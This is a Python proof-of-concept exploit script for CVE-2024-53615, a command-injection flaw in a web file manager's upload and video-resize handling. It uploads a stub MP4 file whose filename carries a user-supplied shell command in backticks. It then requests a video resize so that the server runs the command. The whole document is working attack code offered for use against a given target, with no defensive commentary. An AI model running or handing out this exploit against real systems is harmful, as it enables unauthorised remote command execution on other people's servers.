#!/usr/bin/env python3
from urllib.parse import urlparse, urlunparse, quote
import argparse
from uuid import uuid4
import requests
from json import loads

def is_valid_url(url: str):
    parsed = urlparse(url)
    # Check if the scheme and netloc are not empty to determine if it's a valid URL
    return all([parsed.scheme, parsed.netloc])

def append_slash_if_needed(url: str):
    parsed_url = urlparse(url)
    # Ensure the path ends with a slash
    path_with_slash = parsed_url.path if parsed_url.path.endswith('/') else f"{parsed_url.path}/"
    # Rebuild the URL with the modified path
    return urlunparse(parsed_url._replace(path=path_with_slash))

def main():
    parser = argparse.ArgumentParser(description="CVE-2024-53615")
    parser.add_argument('--cmd', '-c', type=str, required=True, help="The command to be executed.")
    parser.add_argument('--rhost', '-r', type=str, required=True, help="The remote host. A complete URL")
    args = parser.parse_args()

    cmd = args.cmd
    rhost = append_slash_if_needed(args.rhost)

    if not is_valid_url(rhost):
        print("[!] Invalid URL.")
        exit(1)

    params = {
        'action': 'upload',
    }

    filename = f'exploit-{str(uuid4())}-`{cmd}`.mp4'
    files = {
        'dir': (None, ''),
        'relativePath': (None, 'null'),
        'name': (None, filename),
        'type': (None, 'video/mp4'),
        'file': (filename, '\x00\x00\x00 ftypisom\x00\x00\x02\x00isomiso2avc1mp41\x00\x01\vûmoov\x00\x00\x00lmvhd', 'video/mp4'),
    }

    response = requests.post(rhost, params=params, files=files, verify=False)
    try:
        if loads(response.text)["success"] is not True:
            print("Something went wrong uploading exploit.")
            exit(1)
    except:
        if "upload not allowed" in response.text:
            print("[!] Upload is disabled, instance is not vulnerable.")
        else:
            print("[!] Failure parsing response: ", response.text)
        exit(1)
    print("[+] Exploit uploaded. Executing command...")
    requests.get(f'{rhost}?action=file&file={quote(filename)}&resize=video', verify=False)


if __name__ == "__main__":
    main()
